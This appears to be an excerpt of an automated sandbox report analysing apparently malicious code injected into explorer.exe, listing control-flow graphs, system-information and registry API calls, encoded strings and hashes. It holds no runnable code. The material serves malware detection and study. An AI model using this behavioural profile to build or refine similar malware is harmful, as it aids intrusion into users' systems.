                                                                                                                                                                                                                        control_flow_graph 1533 2ee93d0-2ee9452 call 2f0b340 GetVersionExW 1536 2ee9458-2ee9480 call 2f03030 call 2ee61f0 1533->1536 1537 2ee99f6-2ee9a13 call 2f096b0 1533->1537 1544 2ee9484-2ee94a6 call 2f03030 call 2ee61f0 1536->1544 1545 2ee9482 1536->1545 1550 2ee94aa-2ee94c3 GetModuleHandleA GetProcAddress 1544->1550 1551 2ee94a8 1544->1551 1545->1544 1552 2ee94f4-2ee951f 1550->1552 1553 2ee94c5-2ee94d4 1550->1553 1551->1550 1556 2ee9550-2ee9571 1552->1556 1557 2ee9521-2ee9530 1552->1557 1554 2ee94ea-2ee94f1 call 2f09d26 1553->1554 1555 2ee94d6-2ee94e4 1553->1555 1554->1552 1555->1554 1560 2ee9a14 1555->1560 1558 2ee9577 GetSystemInfo 1556->1558 1559 2ee9573-2ee9575 GetNativeSystemInfo 1556->1559 1562 2ee9546-2ee954d call 2f09d26 1557->1562 1563 2ee9532-2ee9540 1557->1563 1567 2ee957d-2ee9586 1558->1567 1559->1567 1565 2ee9a19-2ee9aa1 call 2f0ea38 call 2f0b340 GetVersionExW 1560->1565 1566 2ee9a14 call 2f0ea38 1560->1566 1562->1556 1563->1560 1563->1562 1601 2ee9aad-2ee9ad5 call 2f03030 call 2ee61f0 1565->1601 1602 2ee9aa3-2ee9aa8 1565->1602 1566->1565 1570 2ee9588-2ee958f 1567->1570 1571 2ee95a4-2ee95a7 1567->1571 1573 2ee9595-2ee959f 1570->1573 1574 2ee99f1 1570->1574 1575 2ee95ad-2ee95b6 1571->1575 1576 2ee9997-2ee999a 1571->1576 1578 2ee99ec 1573->1578 1574->1537 1579 2ee95b8-2ee95c4 1575->1579 1580 2ee95c9-2ee95cc 1575->1580 1576->1574 1581 2ee999c-2ee99a5 1576->1581 1578->1574 1579->1578 1583 2ee9974-2ee9976 1580->1583 1584 2ee95d2-2ee95d9 1580->1584 1585 2ee99cc-2ee99cf 1581->1585 1586 2ee99a7-2ee99ab 1581->1586 1590 2ee9978-2ee9982 1583->1590 1591 2ee9984-2ee9987 1583->1591 1592 2ee95df-2ee9647 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 1584->1592 1593 2ee96b9-2ee995d call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 1584->1593 1588 2ee99dd-2ee99e9 1585->1588 1589 2ee99d1-2ee99db 1585->1589 1594 2ee99ad-2ee99b2 1586->1594 1595 2ee99c0-2ee99ca 1586->1595 1588->1578 1589->1574 1590->1578 1591->1574 1598 2ee9989-2ee9995 1591->1598 1636 2ee964b-2ee966b call 2f1189f 1592->1636 1637 2ee9649 1592->1637 1660 2ee9963-2ee996c 1593->1660 1594->1595 1600 2ee99b4-2ee99be 1594->1600 1595->1574 1598->1578 1600->1574 1618 2ee9ad9-2ee9afb call 2f03030 call 2ee61f0 1601->1618 1619 2ee9ad7 1601->1619 1606 2ee9bef-2ee9c0b call 2f096b0 1602->1606 1634 2ee9aff-2ee9b18 GetModuleHandleA GetProcAddress 1618->1634 1635 2ee9afd 1618->1635 1619->1618 1639 2ee9b1a-2ee9b29 1634->1639 1640 2ee9b49-2ee9b74 1634->1640 1635->1634 1655 2ee966d-2ee967c 1636->1655 1656 2ee96a2-2ee96a4 1636->1656 1637->1636 1646 2ee9b3f-2ee9b46 call 2f09d26 1639->1646 1647 2ee9b2b-2ee9b39 1639->1647 1643 2ee9b76-2ee9b85 1640->1643 1644 2ee9ba1-2ee9bc2 1640->1644 1649 2ee9b97-2ee9b9e call 2f09d26 1643->1649 1650 2ee9b87-2ee9b95 1643->1650 1652 2ee9bc8 GetSystemInfo 1644->1652 1653 2ee9bc4-2ee9bc6 1644->1653 1646->1640 1647->1646 1654 2ee9c0c-2ee9c11 call 2f0ea38 1647->1654 1649->1644 1650->1649 1650->1654 1663 2ee9bce-2ee9bd5 1652->1663 1653->1663 1664 2ee967e-2ee968c 1655->1664 1665 2ee9692-2ee969f call 2f09d26 1655->1665 1659 2ee96aa-2ee96b4 1656->1659 1656->1660 1659->1660 1660->1576 1670 2ee996e 1660->1670 1663->1606 1672 2ee9bd7-2ee9bdf 1663->1672 1664->1565 1664->1665 1665->1656 1670->1583 1676 2ee9be8-2ee9beb 1672->1676 1677 2ee9be1-2ee9be6 1672->1677 1676->1606 1679 2ee9bed 1676->1679 1677->1606 1679->1606
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EE94B2
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573
                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9577
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                                                                                                                                                                        • String ID: RjEsE8==$RjEsFH==$RjEtD8==$RjEtEH==
                                                                                                                                                                                                                        • API String ID: 374719553-2519641472
                                                                                                                                                                                                                        • Opcode ID: 2fd87d99b269ff253d3b652cbfb2a7d0fcc2b2790bb72444289e43bf75b5b0d1
                                                                                                                                                                                                                        • Instruction ID: 580c2996877d762b29969a065636deb45327971d001855ea3354e72db1b4c8ff
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd87d99b269ff253d3b652cbfb2a7d0fcc2b2790bb72444289e43bf75b5b0d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9026BB0E40248ABDF14BB68CD5679D7BB6AB51714F90829CE407673C2EB754E808FD2

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1893 2f1e6d1-2f1e701 call 2f1dfff call 2f1e005 call 2f1e063 1900 2f1e820-2f1e87c call 2f0ea55 call 2f26139 1893->1900 1901 2f1e707-2f1e713 call 2f1e00b 1893->1901 1913 2f1e886-2f1e889 1900->1913 1914 2f1e87e-2f1e884 1900->1914 1901->1900 1906 2f1e719-2f1e725 call 2f1e037 1901->1906 1906->1900 1912 2f1e72b-2f1e74c call 2f17c06 GetTimeZoneInformation 1906->1912 1926 2f1e752-2f1e772 1912->1926 1927 2f1e7fd-2f1e81f call 2f1dff7 call 2f1dfeb call 2f1dff1 1912->1927 1915 2f1e88b-2f1e88d 1913->1915 1916 2f1e88f-2f1e8a2 call 2f17e35 1913->1916 1918 2f1e8d3-2f1e8e5 1914->1918 1915->1918 1931 2f1e8a4 1916->1931 1932 2f1e8ae-2f1e8c7 call 2f26139 1916->1932 1919 2f1e8f5 call 2f1e6d1 1918->1919 1920 2f1e8e7-2f1e8ea 1918->1920 1930 2f1e8fa-2f1e90f call 2f17c06 call 2f096b0 1919->1930 1920->1919 1923 2f1e8ec-2f1e8f3 call 2f1e430 1920->1923 1923->1930 1933 2f1e774-2f1e779 1926->1933 1934 2f1e77c-2f1e784 1926->1934 1940 2f1e8a5-2f1e8ac call 2f17c06 1931->1940 1948 2f1e8c9-2f1e8ca 1932->1948 1949 2f1e8cc-2f1e8cd call 2f17c06 1932->1949 1933->1934 1935 2f1e796-2f1e798 1934->1935 1936 2f1e786-2f1e78d 1934->1936 1943 2f1e79a-2f1e7fa call 2f0b340 * 4 call 2f12427 call 2f1e910 * 2 1935->1943 1936->1935 1942 2f1e78f-2f1e794 1936->1942 1958 2f1e8d2 1940->1958 1942->1943 1943->1927 1948->1940 1949->1958 1958->1918
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E731
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E8FB
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                        • API String ID: 2155170405-239921721
                                                                                                                                                                                                                        • Opcode ID: e1b42f708e17c9959c78a3e9ee7413a478760475ee0aee3b583d7d56e08c5316
                                                                                                                                                                                                                        • Instruction ID: 90027782fc6dee8c66ad8bf6e8d615e7098068ad5e67f987035569b902d3717e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1b42f708e17c9959c78a3e9ee7413a478760475ee0aee3b583d7d56e08c5316
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8514976D00229ABDB24BF65DC45A9EBFB9EF047E0F504566EB14E7180EB709A10CF90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2230 2ee91b0-2ee921a 2231 2ee92f3 2230->2231 2232 2ee9220-2ee9227 2230->2232 2233 2ee92f5-2ee92fb 2231->2233 2234 2ee9230-2ee9247 2232->2234 2235 2ee932c-2ee9332 2233->2235 2236 2ee92fd-2ee9309 2233->2236 2237 2ee93bd call 2f04450 2234->2237 2238 2ee924d-2ee926e call 2f03f40 2234->2238 2239 2ee935b-2ee9373 2235->2239 2240 2ee9334-2ee933f 2235->2240 2241 2ee931f-2ee9329 call 2f09d26 2236->2241 2242 2ee930b-2ee9319 2236->2242 2245 2ee93c2-2ee9452 call 2f0ea38 call 2f0b340 GetVersionExW 2237->2245 2258 2ee929e-2ee92e2 call 2f058c0 2238->2258 2259 2ee9270-2ee927e 2238->2259 2248 2ee939d-2ee93bc call 2f096b0 2239->2248 2249 2ee9375-2ee9381 2239->2249 2246 2ee9351-2ee9358 call 2f09d26 2240->2246 2247 2ee9341-2ee934f 2240->2247 2241->2235 2242->2241 2242->2245 2276 2ee9458-2ee9480 call 2f03030 call 2ee61f0 2245->2276 2277 2ee99f6-2ee9a13 call 2f096b0 2245->2277 2246->2239 2247->2245 2247->2246 2254 2ee9393-2ee939a call 2f09d26 2249->2254 2255 2ee9383-2ee9391 2249->2255 2254->2248 2255->2245 2255->2254 2258->2233 2272 2ee92e4-2ee92e9 2258->2272 2265 2ee9294-2ee929b call 2f09d26 2259->2265 2266 2ee9280-2ee928e 2259->2266 2265->2258 2266->2245 2266->2265 2272->2231 2274 2ee92eb-2ee92ee 2272->2274 2274->2234 2284 2ee9484-2ee94a6 call 2f03030 call 2ee61f0 2276->2284 2285 2ee9482 2276->2285 2290 2ee94aa-2ee94c3 GetModuleHandleA GetProcAddress 2284->2290 2291 2ee94a8 2284->2291 2285->2284 2292 2ee94f4-2ee951f 2290->2292 2293 2ee94c5-2ee94d4 2290->2293 2291->2290 2296 2ee9550-2ee9571 2292->2296 2297 2ee9521-2ee9530 2292->2297 2294 2ee94ea-2ee94f1 call 2f09d26 2293->2294 2295 2ee94d6-2ee94e4 2293->2295 2294->2292 2295->2294 2300 2ee9a14 2295->2300 2298 2ee9577 GetSystemInfo 2296->2298 2299 2ee9573-2ee9575 GetNativeSystemInfo 2296->2299 2302 2ee9546-2ee954d call 2f09d26 2297->2302 2303 2ee9532-2ee9540 2297->2303 2307 2ee957d-2ee9586 2298->2307 2299->2307 2305 2ee9a19-2ee9aa1 call 2f0ea38 call 2f0b340 GetVersionExW 2300->2305 2306 2ee9a14 call 2f0ea38 2300->2306 2302->2296 2303->2300 2303->2302 2341 2ee9aad-2ee9ad5 call 2f03030 call 2ee61f0 2305->2341 2342 2ee9aa3-2ee9aa8 2305->2342 2306->2305 2310 2ee9588-2ee958f 2307->2310 2311 2ee95a4-2ee95a7 2307->2311 2313 2ee9595-2ee959f 2310->2313 2314 2ee99f1 2310->2314 2315 2ee95ad-2ee95b6 2311->2315 2316 2ee9997-2ee999a 2311->2316 2318 2ee99ec 2313->2318 2314->2277 2319 2ee95b8-2ee95c4 2315->2319 2320 2ee95c9-2ee95cc 2315->2320 2316->2314 2321 2ee999c-2ee99a5 2316->2321 2318->2314 2319->2318 2323 2ee9974-2ee9976 2320->2323 2324 2ee95d2-2ee95d9 2320->2324 2325 2ee99cc-2ee99cf 2321->2325 2326 2ee99a7-2ee99ab 2321->2326 2330 2ee9978-2ee9982 2323->2330 2331 2ee9984-2ee9987 2323->2331 2332 2ee95df-2ee9647 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 2324->2332 2333 2ee96b9-2ee995d call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 call 2f03030 call 2ee61f0 call 2f03030 call 2ee61f0 call 2ee6320 call 2f03030 call 2ee61f0 call 2ee91b0 2324->2333 2328 2ee99dd-2ee99e9 2325->2328 2329 2ee99d1-2ee99db 2325->2329 2334 2ee99ad-2ee99b2 2326->2334 2335 2ee99c0-2ee99ca 2326->2335 2328->2318 2329->2314 2330->2318 2331->2314 2338 2ee9989-2ee9995 2331->2338 2376 2ee964b-2ee966b call 2f1189f 2332->2376 2377 2ee9649 2332->2377 2400 2ee9963-2ee996c 2333->2400 2334->2335 2340 2ee99b4-2ee99be 2334->2340 2335->2314 2338->2318 2340->2314 2358 2ee9ad9-2ee9afb call 2f03030 call 2ee61f0 2341->2358 2359 2ee9ad7 2341->2359 2346 2ee9bef-2ee9c0b call 2f096b0 2342->2346 2374 2ee9aff-2ee9b18 GetModuleHandleA GetProcAddress 2358->2374 2375 2ee9afd 2358->2375 2359->2358 2379 2ee9b1a-2ee9b29 2374->2379 2380 2ee9b49-2ee9b74 2374->2380 2375->2374 2395 2ee966d-2ee967c 2376->2395 2396 2ee96a2-2ee96a4 2376->2396 2377->2376 2386 2ee9b3f-2ee9b46 call 2f09d26 2379->2386 2387 2ee9b2b-2ee9b39 2379->2387 2383 2ee9b76-2ee9b85 2380->2383 2384 2ee9ba1-2ee9bc2 2380->2384 2389 2ee9b97-2ee9b9e call 2f09d26 2383->2389 2390 2ee9b87-2ee9b95 2383->2390 2392 2ee9bc8 GetSystemInfo 2384->2392 2393 2ee9bc4-2ee9bc6 2384->2393 2386->2380 2387->2386 2394 2ee9c0c-2ee9c11 call 2f0ea38 2387->2394 2389->2384 2390->2389 2390->2394 2403 2ee9bce-2ee9bd5 2392->2403 2393->2403 2404 2ee967e-2ee968c 2395->2404 2405 2ee9692-2ee969f call 2f09d26 2395->2405 2399 2ee96aa-2ee96b4 2396->2399 2396->2400 2399->2400 2400->2316 2410 2ee996e 2400->2410 2403->2346 2412 2ee9bd7-2ee9bdf 2403->2412 2404->2305 2404->2405 2405->2396 2410->2323 2416 2ee9be8-2ee9beb 2412->2416 2417 2ee9be1-2ee9be6 2412->2417 2416->2346 2419 2ee9bed 2416->2419 2417->2346 2419->2346
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EE94B2
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2167034304-0
                                                                                                                                                                                                                        • Opcode ID: d470458a85928f37324b285e1e8bd1ab350df2c6e8071c181a50c59678cd78a5
                                                                                                                                                                                                                        • Instruction ID: ca3b8b31f791eb7a7ed88adbdeefef2a053e757c6f33938dec98bda1c1dfbfdf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d470458a85928f37324b285e1e8bd1ab350df2c6e8071c181a50c59678cd78a5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FC10671E002089BEF18DF68CDC4B9DBBB6EF45314F508658E8069B2C6DB74DA84CB91
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: GetUserNameA.ADVAPI32(?,?), ref: 02EE75BA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 02EE7600
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 02EE760D
                                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 02EFF142
                                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(80000002), ref: 02EFF158
                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,80000002), ref: 02EFF1E2
                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02EFF26D
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000001), ref: 02EE651A
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000002), ref: 02EE6668
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                                                                                                                                                                                        • String ID: 153632$246122658369$3X21$3XM1$3mo1$4G41$SS8rDn==$System$V$fWU1$g2g1$g3Q1$gH21$h2U1$hGQ1$hj4=$iW81$inQ1
                                                                                                                                                                                                                        • API String ID: 4106312383-3634076616
                                                                                                                                                                                                                        • Opcode ID: 3fb7970e74e580518aed49cdb3586a0cedc0d6e5d5e89cf3293dcf617c5bd76e
                                                                                                                                                                                                                        • Instruction ID: 36af4baf8f662e92a306489e9ec504ffd2c81b95dfe338ebaa8a2ddc4e088111
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fb7970e74e580518aed49cdb3586a0cedc0d6e5d5e89cf3293dcf617c5bd76e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6D243719011588BEB29DB28CD88B9DBB76AF82348F5081DCD20DA72D6DB758FC09F51

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1726 2f1e430-2f1e462 call 2f1dfff call 2f1e005 call 2f1e063 1733 2f1e6c6-2f1e701 call 2f0ea55 call 2f1dfff call 2f1e005 call 2f1e063 1726->1733 1734 2f1e468-2f1e474 call 2f1e00b 1726->1734 1764 2f1e820-2f1e87c call 2f0ea55 call 2f26139 1733->1764 1765 2f1e707-2f1e713 call 2f1e00b 1733->1765 1734->1733 1739 2f1e47a-2f1e484 1734->1739 1741 2f1e486 1739->1741 1742 2f1e4bb-2f1e4bd 1739->1742 1744 2f1e488-2f1e48e 1741->1744 1745 2f1e4c0-2f1e4c9 1742->1745 1748 2f1e490-2f1e493 1744->1748 1749 2f1e4ae-2f1e4b0 1744->1749 1745->1745 1750 2f1e4cb-2f1e4e1 call 2f17e35 1745->1750 1752 2f1e495-2f1e49d 1748->1752 1753 2f1e4aa-2f1e4ac 1748->1753 1754 2f1e4b3-2f1e4b5 1749->1754 1760 2f1e4e7-2f1e502 call 2f17c06 1750->1760 1761 2f1e6b8-2f1e6be call 2f17c06 1750->1761 1752->1749 1758 2f1e49f-2f1e4a8 1752->1758 1753->1754 1754->1742 1759 2f1e6bf-2f1e6c3 1754->1759 1758->1744 1758->1753 1771 2f1e505-2f1e50f 1760->1771 1761->1759 1786 2f1e886-2f1e889 1764->1786 1787 2f1e87e-2f1e884 1764->1787 1765->1764 1775 2f1e719-2f1e725 call 2f1e037 1765->1775 1771->1771 1774 2f1e511-2f1e525 call 2f1c0f3 1771->1774 1783 2f1e6c4 1774->1783 1784 2f1e52b-2f1e57d call 2f0b340 * 4 call 2f1e3e9 1774->1784 1775->1764 1785 2f1e72b-2f1e74c call 2f17c06 GetTimeZoneInformation 1775->1785 1783->1733 1845 2f1e57e-2f1e581 1784->1845 1802 2f1e752-2f1e772 1785->1802 1803 2f1e7fd-2f1e81f call 2f1dff7 call 2f1dfeb call 2f1dff1 1785->1803 1788 2f1e88b-2f1e88d 1786->1788 1789 2f1e88f-2f1e8a2 call 2f17e35 1786->1789 1792 2f1e8d3-2f1e8e5 1787->1792 1788->1792 1807 2f1e8a4 1789->1807 1808 2f1e8ae-2f1e8c7 call 2f26139 1789->1808 1793 2f1e8f5 call 2f1e6d1 1792->1793 1794 2f1e8e7-2f1e8ea 1792->1794 1806 2f1e8fa-2f1e90f call 2f17c06 call 2f096b0 1793->1806 1794->1793 1798 2f1e8ec-2f1e8f3 call 2f1e430 1794->1798 1798->1806 1810 2f1e774-2f1e779 1802->1810 1811 2f1e77c-2f1e784 1802->1811 1817 2f1e8a5-2f1e8ac call 2f17c06 1807->1817 1827 2f1e8c9-2f1e8ca 1808->1827 1828 2f1e8cc-2f1e8cd call 2f17c06 1808->1828 1810->1811 1812 2f1e796-2f1e798 1811->1812 1813 2f1e786-2f1e78d 1811->1813 1821 2f1e79a-2f1e7fa call 2f0b340 * 4 call 2f12427 call 2f1e910 * 2 1812->1821 1813->1812 1820 2f1e78f-2f1e794 1813->1820 1839 2f1e8d2 1817->1839 1820->1821 1821->1803 1827->1817 1828->1839 1839->1792 1847 2f1e583 1845->1847 1848 2f1e586-2f1e589 1845->1848 1847->1848 1848->1845 1850 2f1e58b-2f1e599 1848->1850 1852 2f1e59b 1850->1852 1853 2f1e59e-2f1e5b3 call 2f115d1 1850->1853 1852->1853 1859 2f1e5b6-2f1e5bc 1853->1859 1861 2f1e5c7-2f1e5ca 1859->1861 1862 2f1e5be-2f1e5c5 1859->1862 1861->1859 1862->1861 1864 2f1e5cc-2f1e5d2 1862->1864 1867 2f1e5d8-2f1e603 call 2f115d1 1864->1867 1868 2f1e66c-2f1e673 1864->1868 1875 2f1e625-2f1e62b 1867->1875 1876 2f1e605-2f1e609 1867->1876 1870 2f1e675-2f1e677 1868->1870 1871 2f1e67a-2f1e68b 1868->1871 1870->1871 1873 2f1e6a7-2f1e6b6 call 2f1dff7 call 2f1dfeb 1871->1873 1874 2f1e68d-2f1e6a4 call 2f1e3e9 1871->1874 1873->1761 1874->1873 1875->1868 1882 2f1e62d-2f1e650 call 2f115d1 1875->1882 1879 2f1e60a-2f1e610 1876->1879 1883 2f1e622 1879->1883 1884 2f1e612-2f1e620 1879->1884 1882->1868 1889 2f1e652-2f1e656 1882->1889 1883->1875 1884->1879 1884->1883 1890 2f1e657-2f1e65a 1889->1890 1891 2f1e669 1890->1891 1892 2f1e65c-2f1e667 1890->1892 1891->1868 1892->1890 1892->1891
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E4ED
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E6B9
